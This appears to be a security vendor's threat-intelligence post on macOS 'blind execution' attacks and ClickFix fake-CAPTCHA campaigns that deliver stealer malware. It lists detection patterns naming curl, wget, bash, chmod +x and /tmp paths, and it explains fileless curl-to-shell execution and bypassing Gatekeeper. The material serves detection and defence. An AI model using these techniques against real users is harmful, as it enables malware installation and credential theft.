Legit tools + simple primitives are weaponized everywhere
Blind execution represents a critical evasion technique where victims unknowingly execute malicious code without any opportunity to review it. Attackers leverage this in multiple scenarios:
- Social engineering: "Just run this one command to fix your issue."
- Fake software installers mimicking legitimate tools (Docker or Homebrew)
- Post-exploitation C2 communications downloading additional tools
- Supply chain attacks delivering staged malware
This attack vector is devastatingly effective because:
- Users trust terminal commands - Especially when presented as "fixes" from seemingly legitimate sources
- Security tools can't inspect - Command execution happens in trusted contexts (Terminal.app, iTerm2)
- No file drops required - Fileless execution via curl pipe to shell leaves minimal forensic traces
- Bypasses Gatekeeper - Commands executed directly in Terminal bypass macOS code-signing checks
Observed Patterns:
We can't straight-up block curl or bash, but we can recognize risky compositions like:
- Script Editor, Terminal, iTerm2, Mono / .NET runtimes
- curl, wget, bash, zsh, chmod +x, xattr /tmp paths.
- LaunchAgents created npm/node from browser-originated files or unusual users.
Detections (for Anvilogic customers):
- macOS - Suspicious Curl Download to Temp Directory
- Blind Script Execution via Command Substitution Fileless Attack
- Gatekeeper Bypass via curl to tmp followed by chmod +x Execution
Real-World Usage:
- ClickFix Campaigns (2024-2025): 517% increase in H1 2025 (ESET), becoming #2 attack vector after phishing, accounting for 8% of all blocked attacks. Fake CAPTCHA/verification pages instruct users to paste malicious commands into Terminal (macOS) or PowerShell (Windows). Campaigns targeting:
- Spectrum telecom impersonation delivering Atomic macOS Stealer (AMOS)
- Google Meet fake conference pages
- Fake Cloudflare CAPTCHA verifications
- TradingView financial platform spoofs
- Odyssey Stealer deployment via tradingviewen[.]com
.svg)
